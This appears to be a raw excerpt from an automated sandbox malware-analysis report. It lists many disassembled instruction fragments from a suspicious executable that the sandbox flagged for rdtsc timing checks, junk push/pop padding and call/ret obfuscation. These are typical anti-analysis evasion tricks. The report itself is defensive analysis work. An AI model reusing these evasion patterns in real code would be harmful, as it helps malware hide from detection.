                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CCA175 second address: CCA185 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F612923D90Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CCA185 second address: CCA191 instructions: 0x00000000 rdtsc 0x00000002 js 00007F61286B717Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CCF592 second address: CCF5AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D918h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CD8584 second address: CD8590 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F61286B7176h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CD8590 second address: CD85E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F612923D915h 0x00000008 jmp 00007F612923D911h 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 jbe 00007F612923D90Ch 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jne 00007F612923D925h 0x0000001e push eax 0x0000001f jmp 00007F612923D90Dh 0x00000024 pop eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CD8BE7 second address: CD8BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CD8BEB second address: CD8BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CD900B second address: CD9020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F61286B717Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CD9154 second address: CD9158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CD9158 second address: CD9187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F61286B7188h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pushad 0x00000018 popad 0x00000019 push edi 0x0000001a pop edi 0x0000001b pop ecx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CD9590 second address: CD9596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CD9596 second address: CD95B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B717Ah 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F61286B7176h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CD95B2 second address: CD95D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D918h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CD95D3 second address: CD95D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CD95D9 second address: CD95DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CDDD7C second address: CDDD81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CDDD81 second address: CDDD86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CDDD86 second address: CDDD8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CDE8D4 second address: CDE904 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F612923D919h 0x00000008 pop edi 0x00000009 pushad 0x0000000a jmp 00007F612923D910h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CDEA47 second address: CDEA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CDEC0F second address: CDEC19 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F612923D906h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CDEC19 second address: CDEC23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CDEC23 second address: CDEC27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CDEC27 second address: CDEC2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CE46DA second address: CE46DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CECAFF second address: CECB14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F61286B7176h 0x0000000a popad 0x0000000b jne 00007F61286B717Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CEBA09 second address: CEBA1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F612923D90Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CEBE22 second address: CEBE28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CEBE28 second address: CEBE2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CEBF98 second address: CEBFB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jmp 00007F61286B7185h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CEBFB8 second address: CEBFBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CEC2CA second address: CEC2D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CEC2D1 second address: CEC2DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F612923D906h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CEC58B second address: CEC5A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B717Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA2114 second address: CA2118 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA2249 second address: CA2306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jne 00007F61286B7176h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebx 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F61286B7178h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov dx, 1BB3h 0x0000002d push dword ptr fs:[00000000h] 0x00000034 mov dx, di 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push 00000000h 0x00000040 push ebp 0x00000041 call 00007F61286B7178h 0x00000046 pop ebp 0x00000047 mov dword ptr [esp+04h], ebp 0x0000004b add dword ptr [esp+04h], 00000014h 0x00000053 inc ebp 0x00000054 push ebp 0x00000055 ret 0x00000056 pop ebp 0x00000057 ret 0x00000058 mov dword ptr [ebp+1247CF03h], esp 0x0000005e mov dword ptr [ebp+122D1844h], esi 0x00000064 cmp dword ptr [ebp+122D2C83h], 00000000h 0x0000006b jne 00007F61286B71F8h 0x00000071 jmp 00007F61286B717Dh 0x00000076 mov dword ptr [ebp+122D1AD3h], ecx 0x0000007c mov byte ptr [ebp+122D3041h], 00000047h 0x00000083 mov edi, 3BA41E1Fh 0x00000088 mov eax, D49AA7D2h 0x0000008d mov dword ptr [ebp+12449EB9h], edx 0x00000093 or dword ptr [ebp+122D390Ch], edx 0x00000099 push eax 0x0000009a push eax 0x0000009b push edx 0x0000009c jmp 00007F61286B7184h 0x000000a1 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA26BD second address: CA26C6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA2A1F second address: CA2A42 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F61286B7185h 0x00000008 jmp 00007F61286B717Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007F61286B7176h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA2A42 second address: CA2A63 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F612923D906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D1948h], eax 0x00000012 push 00000004h 0x00000014 or dword ptr [ebp+12449EC0h], ebx 0x0000001a nop 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA2A63 second address: CA2A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA2A67 second address: CA2A6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA2A6B second address: CA2A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA2A71 second address: CA2A99 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F612923D91Bh 0x00000008 jmp 00007F612923D915h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA2E91 second address: CA2EFD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F61286B7178h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b call 00007F61286B717Ch 0x00000010 call 00007F61286B717Bh 0x00000015 jmp 00007F61286B717Dh 0x0000001a pop edx 0x0000001b pop edx 0x0000001c push 0000001Eh 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007F61286B7178h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 0000001Bh 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 jmp 00007F61286B717Ch 0x0000003d nop 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 push ebx 0x00000042 pop ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA2EFD second address: CA2F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA3270 second address: CA3284 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7180h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA335B second address: CA3361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA3361 second address: C89ADC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F61286B7176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F61286B7178h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 mov ecx, dword ptr [ebp+122D59C9h] 0x0000002f call dword ptr [ebp+1245769Ch] 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push ebx 0x00000039 pop ebx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA2105 second address: CA2114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F612923D906h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CF0388 second address: CF0398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CF0398 second address: CF039D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CF096B second address: CF0992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F61286B7176h 0x0000000a pop esi 0x0000000b jmp 00007F61286B7184h 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F61286B7176h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CF33DD second address: CF33E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CF5F0C second address: CF5F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CF5F10 second address: CF5F1A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F612923D906h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CF5F1A second address: CF5F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CFB160 second address: CFB18C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D915h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007F612923D90Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CFA4C7 second address: CFA4F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edx 0x00000006 pop edx 0x00000007 jc 00007F61286B7176h 0x0000000d popad 0x0000000e jmp 00007F61286B717Fh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edx 0x00000016 jng 00007F61286B717Eh 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CFA7CA second address: CFA7D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CFA7D4 second address: CFA7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CFA7D8 second address: CFA7E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F612923D906h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CFA7E4 second address: CFA7EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F61286B7176h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CFA7EF second address: CFA80A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007F612923D90Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CFA973 second address: CFA994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F61286B7185h 0x00000009 jnl 00007F61286B7176h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CFA994 second address: CFA999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CFA999 second address: CFA99E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CFAC90 second address: CFAC9A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F612923D906h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CFAC9A second address: CFACA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C5ABE1 second address: C5ABEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F612923D906h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C5ABEB second address: C5AC03 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F61286B717Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: C5AC03 second address: C5AC07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D00291 second address: D00297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D00297 second address: D002BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D918h 0x00000007 jmp 00007F612923D90Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D0053F second address: D00543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D00543 second address: D00564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F612923D916h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D00564 second address: D00581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F61286B7181h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D00581 second address: D00587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D00587 second address: D0058D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D0058D second address: D0059B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 jne 00007F612923D90Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D006FD second address: D00703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA2D0E second address: CA2D14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA2D14 second address: CA2D5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B717Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F61286B7178h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D1BE2h], ebx 0x0000002a push 00000004h 0x0000002c jc 00007F61286B7179h 0x00000032 sub dl, 0000002Fh 0x00000035 nop 0x00000036 push esi 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA2D5A second address: CA2D5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D0084B second address: D0084F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D009D5 second address: D009D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D009D9 second address: D009DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
